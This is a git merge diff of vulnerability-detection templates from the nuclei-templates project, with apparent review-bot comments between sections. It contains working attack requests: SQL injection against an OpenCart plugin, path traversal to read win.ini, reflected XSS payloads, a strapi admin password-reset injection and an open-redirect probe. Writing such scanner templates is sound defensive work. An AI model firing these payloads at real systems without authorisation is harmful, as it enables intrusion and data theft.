Merge branch 'projectdiscovery:master' into master

patch-1
idealphase 2022-05-11 00:19:52 +07:00 committed by GitHub
commit 32f0310f59
107 changed files with 2801 additions and 1758 deletions


@ -1,21 +1,5 @@
cves/2021/CVE-2021-25111.yaml
cves/2021/CVE-2021-25118.yaml
cves/2021/CVE-2021-36356.yaml
cves/2021/CVE-2021-39312.yaml
cves/2022/CVE-2022-0165.yaml
cves/2022/CVE-2022-0201.yaml
cves/2022/CVE-2022-0288.yaml
cves/2022/CVE-2022-0422.yaml
cves/2022/CVE-2022-0543.yaml
cves/2022/CVE-2022-0591.yaml
cves/2022/CVE-2022-26352.yaml
cves/2022/CVE-2022-26564.yaml
exposed-panels/cyberoam-ssl-vpn-panel.yaml
exposed-panels/oracle-containers-panel.yaml
exposed-panels/oracle-enterprise-manager-login.yaml
exposed-panels/supermicro-bmc-panel.yaml
exposed-panels/xoops/xoops-installation-wizard.yaml
exposed-panels/zoneminder-login.yaml
exposures/files/desktop-ini-exposure.yaml
technologies/sucuri-firewall.yaml
vulnerabilities/wordpress/health-check-lfi.yaml
cves/2022/CVE-2022-1040.yaml
cves/2022/CVE-2022-29548.yaml
vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
vulnerabilities/wordpress/wp-security-open-redirect.yaml
vulnerabilities/wordpress/wp-under-construction-ssrf.yaml


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1131 | daffainfo | 559 | cves | 1135 | info | 1165 | http | 3129 |
| panel | 505 | dhiyaneshdk | 415 | exposed-panels | 511 | high | 861 | file | 60 |
| lfi | 457 | pikpikcu | 315 | vulnerabilities | 444 | medium | 649 | network | 49 |
| xss | 356 | pdteam | 262 | technologies | 250 | critical | 405 | dns | 17 |
| wordpress | 349 | geeknik | 177 | exposures | 202 | low | 178 | | |
| exposure | 289 | dwisiswant0 | 165 | misconfiguration | 194 | unknown | 6 | | |
| rce | 285 | 0x_akoko | 127 | workflows | 186 | | | | |
| cve2021 | 278 | princechaddha | 127 | token-spray | 153 | | | | |
| tech | 264 | gy741 | 116 | default-logins | 93 | | | | |
| wp-plugin | 251 | pussycat0x | 107 | takeovers | 67 | | | | |
| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 |
| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 |
| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 |
| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 |
| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | |
| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | |
| rce | 289 | princechaddha | 130 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | |
| tech | 265 | gy741 | 117 | default-logins | 95 | | | | |
| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | |
**254 directories, 3476 files**.
**260 directories, 3520 files**.
</td>
</tr>




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1131 | daffainfo | 559 | cves | 1135 | info | 1165 | http | 3129 |
| panel | 505 | dhiyaneshdk | 415 | exposed-panels | 511 | high | 861 | file | 60 |
| lfi | 457 | pikpikcu | 315 | vulnerabilities | 444 | medium | 649 | network | 49 |
| xss | 356 | pdteam | 262 | technologies | 250 | critical | 405 | dns | 17 |
| wordpress | 349 | geeknik | 177 | exposures | 202 | low | 178 | | |
| exposure | 289 | dwisiswant0 | 165 | misconfiguration | 194 | unknown | 6 | | |
| rce | 285 | 0x_akoko | 127 | workflows | 186 | | | | |
| cve2021 | 278 | princechaddha | 127 | token-spray | 153 | | | | |
| tech | 264 | gy741 | 116 | default-logins | 93 | | | | |
| wp-plugin | 251 | pussycat0x | 107 | takeovers | 67 | | | | |
| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 |
| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 |
| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 |
| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 |
| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | |
| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | |
| rce | 289 | princechaddha | 130 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | |
| tech | 265 | gy741 | 117 | default-logins | 95 | | | | |
| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | |


@ -26,4 +26,4 @@ network:
words:
- "SSH-1"
# Updated by Chris on 2022/01/21
# Enhanced by Chris on 2022/01/21


@ -1,13 +1,14 @@
id: CVE-2005-2428
info:
name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure
name: Lotus Domino R5 and R6 WebMail - Information Disclosure
author: CasperGN
severity: medium
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
description: "Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696)."
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
@ -31,4 +32,4 @@ requests:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body
# Enhanced by mp on 2022/02/02
# Enhanced by mp on 2022/05/04


@ -10,6 +10,9 @@ info:
- https://www.tenable.com/cve/CVE-2009-1872
classification:
cve-id: CVE-2009-1872
metadata:
verified: true
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2009,adobe,xss,coldfusion
requests:


@ -33,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/09


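--- /dev/null
+++ b/CVE-2017-11512.yaml
@@ -0,0 +1,36 @@
+id: CVE-2017-11512
+info:
+name: ManageEngine ServiceDesk - Unauthenticated Arbitrary File Download
+author: 0x_Akoko
+severity: high
+description: |
+The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the name parameter for the download-snapshot URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
+reference:
+- https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html
+- https://www.cvedetails.com/cve/CVE-2017-11512
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+cvss-score: 7.5
+cve-id: CVE-2017-11512
+cwe-id: CWE-22
+metadata:
+verified: true
+shodan-query: http.title:"ManageEngine"
+tags: cve,cve2017,manageengine,lfr,unauth
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini'
+- '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini'
+stop-at-first-match: true
+matchers:
+- type: word
+part: body
+words:
+- "bit app support"
+- "fonts"
+- "extensions"
+condition: and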
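Review bot: The reference list of this new template has no NVD entry, while the rest of this commit adds `https://nvd.nist.gov/vuln/detail/CVE-...` links to existing templates (Cisco, Openfire, Zimbra and Artifactory sections); adding `- https://nvd.nist.gov/vuln/detail/CVE-2017-11512` keeps the new file consistent with them. `description: |` keeps a trailing newline in the value; `description: |-` is the cleaner choice for a single-paragraph description. Indentation is not visible in this rendering, so the nesting of `metadata` under `info` and of `matchers` under the request cannot be checked here.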


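--- /dev/null
+++ b/CVE-2018-11231.yaml
@@ -0,0 +1,37 @@
+id: CVE-2018-11231
+info:
+name: Opencart Divido plugin - Sql Injection
+author: ritikchaddha
+severity: high
+reference:
+- http://foreversong.cn/archives/1183
+- https://nvd.nist.gov/vuln/detail/CVE-2018-11231
+tags: opencart,sqli,cve,cve2018
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+cvss-score: 8.10
+cve-id: CVE-2018-11231
+cwe-id: CWE-89
+description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information."
+requests:
+- raw:
+- |
+POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
+Host: {{Hostname}}
+{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2}
+redirects: true
+max-redirects: 2
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "6f7c6dcbc380aac3bcba1f9fccec991e"
+- type: status
+status:
+- 200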
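Review bot: The `name` reads `Opencart Divido plugin - Sql Injection`, while the renames elsewhere in this commit standardise on `- SQL Injection` (see the Oracle WebCenter Sites section); `name: OpenCart Divido Plugin - SQL Injection` would match that convention and the spelling used in the description. `cvss-score: 8.10` is parsed as the float 8.1, so write `8.1` as the sibling templates do. The raw request carries a JSON body with no `Content-Type: application/json` header; if the endpoint ignores the body without it the matcher never fires, so this is worth confirming against the referenced write-up. The key order (`tags` and `description` after `classification`) also differs from every other template in this commit, where `description` precedes `reference`.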


@ -20,12 +20,18 @@ requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php"
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
redirects: true
body: |
icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'
- 'contains(tolower(all_headers), "text/html")'
- 'contains(set_cookie, "_icl_current_admin_language")'
- 'contains(body, "\"><script>alert(0);</script>")'
condition: and
# Enhanced by mp on 2022/04/08
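Review bot: Switching `body` from a quoted scalar to `body: |` appends a trailing newline to the POST body, so the last form field is now sent as `...alert(0);</script>\n` unless nuclei strips it; `body: |-` keeps the value byte-identical to the old quoted form. The same applies to the `body: |` introduced in the CVE-2019-14223 (Alfresco) section, where `password=badpass` gains a trailing newline. Splitting the single DSL expression into three entries under `condition: and` is equivalent and reads better.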


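--- /dev/null
+++ b/CVE-2019-12962.yaml
@@ -0,0 +1,45 @@
+id: CVE-2019-12962
+info:
+name: LiveZilla Server 8.0.1.0 - Cross Site Scripting
+author: Clment Cruchet
+severity: medium
+description: |
+LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
+reference:
+- https://www.exploit-db.com/exploits/49669
+- https://nvd.nist.gov/vuln/detail/CVE-2019-12962
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.10
+cve-id: CVE-2019-12962
+cwe-id: CWE-79
+metadata:
+verified: true
+shodan-query: http.html:LiveZilla
+tags: cve,cve2019,livezilla,xss
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/mobile/index.php'
+headers:
+Accept-Language: ';alert(document.domain)//'
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "var detectedLanguage = ';alert(document.domain)//';"
+- type: word
+part: header
+words:
+- "text/html"
+- type: status
+status:
+- 200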
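Review bot: `author: Clment Cruchet` looks like a dropped non-ASCII character (presumably `Clément`); worth checking that the file is UTF-8 and the name is spelled as intended, since this field is used for attribution. `cvss-score: 6.10` is parsed as the float 6.1 — write `6.1` as the other templates do. The `description` is only a restatement of `name`; a sentence saying that the `Accept-Language` header value is reflected unescaped into a script variable in `/mobile/index.php` would tell a reader what the body matcher is checking.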


@ -14,17 +14,21 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-14223
cwe-id: CWE-601
tags: cve,cve2019,redirect
tags: cve,cve2019,redirect,alfresco
requests:
- method: POST
path:
- '{{BaseURL}}/share/page/dologin'
headers:
Content-Type: application/x-www-form-urlencoded
body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass
body: |
success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass
matchers:
- type: regex
part: body
part: header
regex:
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$"
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$"


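--- a/CVE-2019-15043.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: CVE-2019-15043
-info:
-name: Grafana unauthenticated API
-author: bing0o
-severity: high
-description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
-reference:
-- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
-- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
-- https://community.grafana.com/t/release-notes-v6-3-x/19202
-classification:
-cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
-cvss-score: 7.5
-cve-id: CVE-2019-15043
-cwe-id: CWE-306
-tags: cve,cve2019,grafana
-requests:
-- raw:
-- |
-POST /api/snapshots HTTP/1.1
-Host: {{Hostname}}
-Connection: close
-Content-Length: 235
-Accept: */*
-Accept-Language: en
-Content-Type: application/json
-{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
-matchers:
-- part: body
-type: word
-words:
-- deleteKey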


@ -1,11 +1,12 @@
id: CVE-2019-1821
info:
name: Cisco Prime Infrastructure Unauthorized RCE
name: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
author: _0xf4n9x_
severity: critical
description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability.
description: Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
reference:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce
- https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-1821
classification:
@ -49,3 +50,5 @@ requests:
- "status_code == 200"
- "contains((body_2), '{{randstr}}')"
condition: and
# Enhanced by mp on 2022/05/03
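Review bot: The new description has a grammar slip, `This vulnerability exist because` — it should read `This vulnerability exists because`. The rewritten description also says the attacker is authenticated, while the srcincite reference kept in the list is titled as an unauthenticated RCE; the two should be reconciled so the template's summary does not understate the exposure it detects.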


@ -1,13 +1,14 @@
id: CVE-2019-18394
info:
name: Openfire Full Read SSRF
name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
author: pdteam
severity: critical
description: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests.
description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
reference:
- https://swarm.ptsecurity.com/openfire-admin-console/
- https://github.com/igniterealtime/Openfire/pull/1497
- https://nvd.nist.gov/vuln/detail/CVE-2019-18394
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -25,3 +26,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/05/03


@ -1,10 +1,10 @@
id: CVE-2019-18818
info:
name: strapi CMS Unauthenticated Admin Password Reset
name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
author: idealphase
severity: critical
description: strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
description: "strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js."
reference:
- https://github.com/advisories/GHSA-6xc2-mj39-q599
- https://www.exploit-db.com/exploits/50239
@ -23,7 +23,9 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
matchers-condition: and
matchers:
- type: status
@ -49,4 +51,5 @@ requests:
- .user.username
- .user.email
# Enhanced by mp on 2022/04/01
# Enhanced by mp on 2022/05/03


@ -1,12 +1,13 @@
id: CVE-2019-19781
info:
name: Citrix ADC Directory Traversal
name: Citrix ADC and Gateway - Directory Traversal
author: organiccrap,geeknik
severity: critical
description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.
reference:
- https://support.citrix.com/article/CTX267027
- https://nvd.nist.gov/vuln/detail/CVE-2019-19781
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -28,3 +29,5 @@ requests:
- type: word
words:
- "[global]"
# Enhanced by mp on 2022/05/03


@ -1,12 +1,12 @@
id: CVE-2019-2578
info:
name: Oracle WebCenter Sites Broken Access Control
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control
author: leovalcante
severity: high
description: Oracle WebCenter Sites 12.2.1.3.0 (a component of Oracle Fusion Middleware) suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical
data or complete access to all Oracle WebCenter Sites accessible data.
description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
reference:
- https://www.oracle.com/security-alerts/cpuapr2019.html
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
classification:
@ -32,4 +32,5 @@ requests:
regex:
- '<script[\d\D]*<throwexception/>'
# Enhanced by mp on 2022/04/06
# Enhanced by mp on 2022/05/04


@ -1,14 +1,14 @@
id: CVE-2019-2579
info:
name: Oracle WebCenter Sites - SQL Injection
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
author: leovalcante
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker
with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://github.com/Leovalcante/wcs_scanner
- https://nvd.nist.gov/vuln/detail/CVE-2019-2579
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
@ -49,3 +49,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04


@ -1,15 +1,16 @@
id: CVE-2019-2725
info:
name: Oracle WebLogic Server - Unauthenticated RCE
name: Oracle WebLogic Server - Remote Command Execution
author: dwisiswant0
severity: critical
description: |
Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.
reference:
- https://paper.seebug.org/910/
- https://www.exploit-db.com/exploits/46780/
- https://www.oracle.com/security-alerts/cpujan2020.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-2725
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -43,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/03


@ -1,14 +1,13 @@
id: CVE-2019-3396
info:
name: Atlassian Confluence Path Traversal
name: Atlassian Confluence Server - Path Traversal
author: harshbothra_
severity: critical
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before
6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server
or Data Center instance via server-side template injection.
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
reference:
- https://github.com/x-f1v3/CVE-2019-3396
- https://nvd.nist.gov/vuln/detail/CVE-2019-3396
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -36,3 +35,5 @@ requests:
- type: word
words:
- "<param-name>contextConfigLocation</param-name>"
# Enhanced by mp on 2022/05/03


@ -1,12 +1,10 @@
id: CVE-2019-3929
info:
name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929)
name: Barco/AWIND OEM Presentation Platform - Remote Command Injection
author: _0xf4n9x_
severity: critical
description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware
2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7
are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
reference:
- http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
- https://www.exploit-db.com/exploits/46786/
@ -33,3 +31,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/05/03


@ -1,13 +1,13 @@
id: CVE-2019-5127
info:
name: YouPHPTube Encoder RCE
name: YouPHPTube Encoder 2.3 - Remote Command Injection
author: pikpikcu
severity: critical
description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in
YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack.
description: "YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php."
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
- https://nvd.nist.gov/vuln/detail/CVE-2019-5127
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -47,3 +47,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/03


@ -1,13 +1,13 @@
id: CVE-2019-6112
info:
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
name: WordPress Sell Media 2.4.1 - Cross-Site Scripting
author: dwisiswant0
severity: medium
description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter
(aka $search_term or the Search field).
description: "WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field)."
reference:
- https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
- https://nvd.nist.gov/vuln/detail/CVE-2019-6112
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -30,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04


@ -1,13 +1,14 @@
id: CVE-2019-7238
info:
name: NEXUS < 3.14.0 Remote Code Execution
name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
author: pikpikcu
severity: critical
description: Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.
description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238
- https://github.com/jas502n/CVE-2019-7238
- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -34,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/03
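Review bot: The reference list on the new side contains `https://nvd.nist.gov/vuln/detail/CVE-2019-7238` twice — once as the first entry and once as the last; the hunk counts show one of them is newly added by this commit, so the duplicate should be dropped. The new `name` (`<3.15.0`) now agrees with the description's "before 3.15.0", which the old `< 3.14.0` did not.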


@ -4,10 +4,11 @@ info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
description: Linear eMerge E3-Series devices allow Command Injections.
description: Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
reference:
- https://www.exploit-db.com/exploits/47619
- http://linear-solutions.com/nsc_family/e3-series/
- https://nvd.nist.gov/vuln/detail/CVE-2019-7256
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
@ -34,3 +35,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/05/03


@ -1,14 +1,14 @@
id: CVE-2019-7609
info:
name: Kibana Timelion Arbitrary Code Execution
name: Kibana Timelion - Arbitrary Code Execution
author: dwisiswant0
severity: critical
description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt
to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
reference:
- https://github.com/mpgn/CVE-2019-7609
- https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
- https://nvd.nist.gov/vuln/detail/CVE-2019-7609
classification:
